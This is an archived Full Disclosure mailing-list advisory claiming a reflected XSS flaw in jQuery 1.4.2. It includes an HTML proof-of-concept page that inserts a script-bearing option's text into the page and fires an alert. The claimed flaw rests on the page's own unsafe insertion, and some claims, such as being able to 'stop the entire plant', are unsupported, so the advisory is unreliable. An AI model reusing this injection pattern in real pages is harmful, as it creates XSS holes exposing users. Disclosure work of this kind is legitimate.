Full Disclosure mailing list archives

XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side


From: Mauro Risonho de Paula Assumpção <mauro.risonho () gmail com>
Date: Tue, 2 Sep 2014 13:50:26 -0300

XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
From: Mauro Risonho de Paula Assumpção
Date: 02.09.2014 13:21:20 -0300

VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001:
XSS Reflected JQuery 1.4.2

LEVEL: MEDIUM
In our tests authorized by the customer, we can stop the entire plant.

Published: 09/01/2014
Version: 1.0

Vendor: Jquery (https://jquery.org/)
Product: Jquery 1.4.2 (
http://blog.jquery.com/2010/02/19/jquery-142-released/)
Version affected: 1.4.2

Product description:
Jquery is a open source software.
jQuery is a cross-platform JavaScript library designed to simplify the
client-side scripting of HTML(1).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Create object option in runtime client-side and insert XSS
Reflected
‘index.html’ page, by phishing or fake site remote.

CVE: CVE-2014-? (feedback cve mitre)

Proof of Concept:
Exploit:jquery-xss-reflected.com.br.html

<!DOCTYPE html>
<! -- Mauro Risonho de Paula Assumpcao -->
<! -- aka firebits mauro.risonho () gmail com -->
<! -- Exploit jQuery JavaScript Library v1.4.2 -->
<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil                            -->
<! --   _____.__              ___.   .__  __
-->
<! -- _/ ____\__|______   ____\_ |__ |__|/  |_  ______                -->
<! -- \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/                -->
<! -- |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \                 -->
<! -- |__|  |__||__|    \___  |___  /__||__| /____  |                -->
<! --                        \/    \/             \/                 -->
<! -- bits on fire - 1989-2014 - brazil                             -->
<! --                                                                 -->
<! -- * jQuery JavaScript Library v1.4.2                            -->
<! -- * http://jquery.com/                                            -->
<! -- *                                                                -->
<! -- * Copyright 2010, John Resig                                    -->
<! -- * Dual licensed under the MIT or GPL Version 2 licenses.        -->
<! -- * http://jquery.org/license                                    -->
<! -- *                                                                -->
<! -- * Includes Sizzle.js                                            -->
<! -- * http://sizzlejs.com/                                        -->
<! -- * Copyright 2010, The Dojo Foundation
-->
<! -- * Released under the MIT, BSD, and GPL Licenses.                -->
<! -- *                                                                -->
<! -- * Date: Sat Feb 13 22:33:48 2010 -0500                        -->
<! -- */                                                            -->

<html>
<head>
  <meta charset="utf-8">
  <title>XSS Reflected - Jquery 1.4.2 </title>
  <script src="http://<target>/js/jquery.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>


<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected">&lt;script&gt;alert(&#x27;xss
reflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil
@firebitsbr - mauro.risonho () gmail com&#x27;);&lt;/script&gt;</option>
      </select>
    </p>
  </form>
</body>
</html>


Vendor Response:
<It was not sent to the vendor, but this is sending to the MITRE CVE to
contact the vendor.> from VSLA Virtual Security Labs Anywhere.

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
Update jquery 1.11.1

Vendor Communication Timeline:
09/01/2014     – Vulnerability disclosed
?             – Confirmation to release vulnerabilities
?             – Advisory published

References

1. Wikipedia http://en.wikipedia.org/wiki/JQuery
2. Jquery http://jquery.com/
3. VSLA Virtual Security Labs Anywhere https://firebitsbr.wordpress.com

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
https://firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread: